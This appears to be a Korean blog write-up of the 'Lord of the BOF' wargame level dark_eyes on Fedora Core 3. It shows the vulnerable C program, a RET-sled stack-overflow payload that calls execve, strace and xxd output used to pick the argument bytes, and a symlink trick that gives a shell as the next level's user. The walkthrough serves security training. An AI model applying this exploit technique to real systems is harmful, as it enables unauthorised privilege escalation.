2012.05.13 14:38


Fedora 내부의 환경은 1번 게시글 참조. 

 1.DEP  환경  : Non-Excute stack 이라고도 불리며 스택에 있는 코드는 실행 권한없음 

  -> 즉 스택에 쉘코드를 박고 ret주소를 가리켜 공격하는 방식은 끝남. 


2.ASC Armor 기능 : Lib 주소에 맨 첫자리가 00 (NULL) 값이 됨으로써 여러번 호출이 안되고 단 한번의 라이브러리 들로만 호출이 됨. 


3. Random Stack : 스택의 주소값이 실행할 때 마다 random 하게 변한다. 즉 정확한 주소를 맞출 수 없다.


4. 1번 문제에서 알아낸 System 함수의 setreuid 초기화 루틴.. 즉 execve 를 사용해야함.



/*

        The Lord of the BOF : The Fellowship of the BOF

        - dark_eyes

        - Local BOF on Fedora Core 3

        - hint : RET sleding

*/


int main(int argc, char *argv[])

{

        char buffer[256];

        char saved_sfp[4];


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        // save sfp

        memcpy(saved_sfp, buffer+264, 4);


        // overflow!!

        strcpy(buffer, argv[1]);


        // restore sfp

        memcpy(buffer+264, saved_sfp, 4);


        printf("%s\n", buffer);

}


페이로드는 다음과 같다.


[  buffer = 264 ] [ sfp = 4 ] [ ret = 4 ] [ argc ] [ argv ] 
  a * 264              aaaa        ret = & ret

                                                 ret  = & ret

                                                           ret = &execve      (인자값)

                                                                                     ln -s k1rha 인자값

 



(gdb) p execve

$1 = {<text variable, no debug info>} 0x7a5490 <execve>

 


다음은 strace를 이용한 값을 오류로서 result 에 저장한다. 


ret 주소의 반복은 전 문제에서 이미 2번정도면 스택을 벗어 난다는 것을 확인 했으므로 2번으로 해준 것이다.)


[iron_golem@Fedora_1stFloor ~]$ strace ./dark_eyes `perl -e 'print "a"x268,"\xb9\x84\x04\x08"x2,"\x91\x54\x7a"'` 2> t13.txt
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaah¹úþ¹¹‘Tz
[iron_golem@Fedora_1stFloor ~]$ cat t13.txt
execve("./dark_eyes", ["./dark_eyes", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa¹¹‘Tz"], [/* 20 vars */]) = 0
uname({sys="Linux", node="Fedora_1stFloor", ...}) = 0
brk(0)                                  = 0x87dd000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=28384, ...}) = 0
old_mmap(NULL, 28384, PROT_READ, MAP_PRIVATE, 3, 0) = 0xf6ff9000
close(3)                                = 0
open("/lib/tls/libc.so.6", O_RDONLY)    = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0 \17s\000"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1512400, ...}) = 0
old_mmap(0x71c000, 1207532, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x71c000
old_mmap(0x83d000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x120000) = 0x83d000
old_mmap(0x841000, 7404, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x841000
close(3)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf6ff8000
mprotect(0x83d000, 8192, PROT_READ)     = 0
mprotect(0x718000, 4096, PROT_READ)     = 0
set_thread_area({entry_number:-1 -> 6, base_addr:0xf6ff8940, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0xf6ff9000, 28384)               = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 1), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf6fff000
write(1, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"..., 280) = 280
execve("<íƒ", [0], [/* 1 var */])       = -1 ENOENT (No such file or directory)
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV +++

이렇게 저장된 t13.txt 파일을 xxd명령어를 이용하여 헥사 코드로 보자.

[iron_golem@Fedora_1stFloor ~]$xxd t13.txt

0000750: 2c20 3238 3029 203d 2032 3830 0a65 7865  , 280) = 280.exe
0000760: 6376 6528 223c ed83 222c 205b 305d 2c20  cve("<..", [0],
0000770: 5b2f 2a20 3120 7661 7220 2a2f 5d29 2020  [/* 1 var */])
0000780: 2020 2020 203d 202d 3120 454e 4f45 4e54       = -1 ENOENT
0000790: 2028 4e6f 2073 7563 6820 6669 6c65 206f   (No such file o
00007a0: 7220 6469 7265 6374 6f72 7929 0a2d 2d2d  r directory).---
00007b0: 2053 4947 5345 4756 2028 5365 676d 656e   SIGSEGV (Segmen
00007c0: 7461 7469 6f6e 2066 6175 6c74 2920 4020  tation fault) @
00007d0: 3020 2830 2920 2d2d 2d0a 2b2b 2b20 6b69  0 (0) ---.+++ ki
00007e0: 6c6c 6564 2062 7920 5349 4753 4547 5620  lled by SIGSEGV
00007f0: 2b2b 2b0a                                +++.
[iron_golem@Fedora_1stFloor ~]$ 



1번문제와 마찬가지로 " = 0x22 라는 점을 이용하여 그 사이값을 인자로 구성한다. 

이후 setreuid 와 system 함수로 쉘을 실행시키는 프로그램으로 심볼릭 링크 걸어 준다. 


[iron_golem@Fedora_1stFloor ~]$ ln -s k1rha `perl -e 'print "\x3c\xed\x83"'`

[iron_golem@Fedora_1stFloor ~]$ export PATH=$PATH:/home/iron_golem/

[iron_golem@Fedora_1stFloor ~]$ `perl -e 'print "\x3c\xed\x83"'`

sh-3.00$ exit

exit


공격 공격~


[iron_golem@Fedora_1stFloor ~]$ ./dark_eyes `perl -e 'print "a"x268,"\xfe\x82\x04\x08"x2,"\x91\x54\x7a"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa˜ùãþþþ‘Tz

sh-3.00$ id

uid=502(dark_eyes) gid=501(iron_golem) groups=501(iron_golem) context=user_u:system_r:unconfined_t

sh-3.00$ my-pass

euid = 502

because of you

sh-3.00$




Posted by k1rha